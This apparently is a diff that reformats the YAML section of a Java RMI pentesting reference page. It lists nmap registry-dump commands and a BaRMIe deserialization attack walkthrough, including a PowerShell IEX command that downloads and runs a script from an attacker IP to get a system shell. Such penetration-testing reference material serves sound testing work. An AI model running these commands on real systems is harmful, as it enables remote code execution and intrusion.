1099 Yaml

pentesting/1099-pentesting-java-rmi.md

@@ -276,34 +276,36 @@ Protocol_Name: Java-RMI    #Protocol Abbreviation if there is one.
 Port_Number:  1098     #Comma separated if there is more than one.
 Protocol_Description: Java Remote Method Inclusion         #Protocol Abbreviation Spelled out
 
-Name: Notes
-Description: Notes for Java-RMI
-Note: """
-The Java Remote Method Invocation, or Java RMI, is a mechanism that allows an object that exists in one Java virtual machine to access and call methods that are contained in another Java virtual machine; This is basically the same thing as a remote procedure call, but in an object-oriented paradigm instead of a procedural one, which allows for communication between Java programs that are not in the same address space.
+Entry_1:
+  Name: Notes
+  Description: Notes for Java-RMI
+  Note: |
+    The Java Remote Method Invocation, or Java RMI, is a mechanism that allows an object that exists in one Java virtual machine to access and call methods that are contained in another Java virtual machine; This is basically the same thing as a remote procedure call, but in an object-oriented paradigm instead of a procedural one, which allows for communication between Java programs that are not in the same address space.
 
-nmap -sC -sV -Pn 10.11.1.73 -p 1100 
-    may dump the reg of the java-rmi instance. If this is the case the machine may be vulnerable to a deserializaion exploit.
-    BaRMIe.jar is the way to go to directly exploit this vulnerability.
-    https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01      is where the latest build is hosted, pre-built
+    nmap -sC -sV -Pn 10.11.1.73 -p 1100 
+        may dump the reg of the java-rmi instance. If this is the case the machine may be vulnerable to a deserializaion exploit.
+        BaRMIe.jar is the way to go to directly exploit this vulnerability.
+        https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01      is where the latest build is hosted, pre-built
 
-useage
-    java -jar BaRMIe_v1.01.jar -attack 10.11.1.73 1100
-    target select)          1
-    available attacks)    1 (illegal bind deserialization)
-    payloads)                1 (Apache Common Collections 3.1 worked for me, others may also work)
-    OS Command)         powershell.exe -command "IEX(new-object net.webclient).downloadstring('http://192.168.119.167:80/3232.ps1')"
+    useage
+        java -jar BaRMIe_v1.01.jar -attack 10.11.1.73 1100
+        target select)          1
+        available attacks)    1 (illegal bind deserialization)
+        payloads)                1 (Apache Common Collections 3.1 worked for me, others may also work)
+        OS Command)         powershell.exe -command "IEX(new-object net.webclient).downloadstring('http://192.168.119.167:80/3232.ps1')"
 
-    enjoy your system shell!
+        enjoy your system shell!
 
-https://book.hacktricks.xyz/pentesting/1099-pentesting-java-rmi
-"""
+    https://book.hacktricks.xyz/pentesting/1099-pentesting-java-rmi
 
-Name: Nmap RMI
-Description: Nmap with RMI Scripts
-Command: """nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1098 {IP}"""
+Entry_2:
+  Name: Nmap RMI
+  Description: Nmap with RMI Scripts
+  Command: nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1098 {IP}
 
-Name: Nmap register
-Description: Dump register of java-rmi instance
-Command: """nmap -sC -sV -Pn {IP} -p 1100"""
+Entry_3:
+  Name: Nmap register
+  Description: Dump register of java-rmi instance
+  Command: nmap -sC -sV -Pn {IP} -p 1100
 ```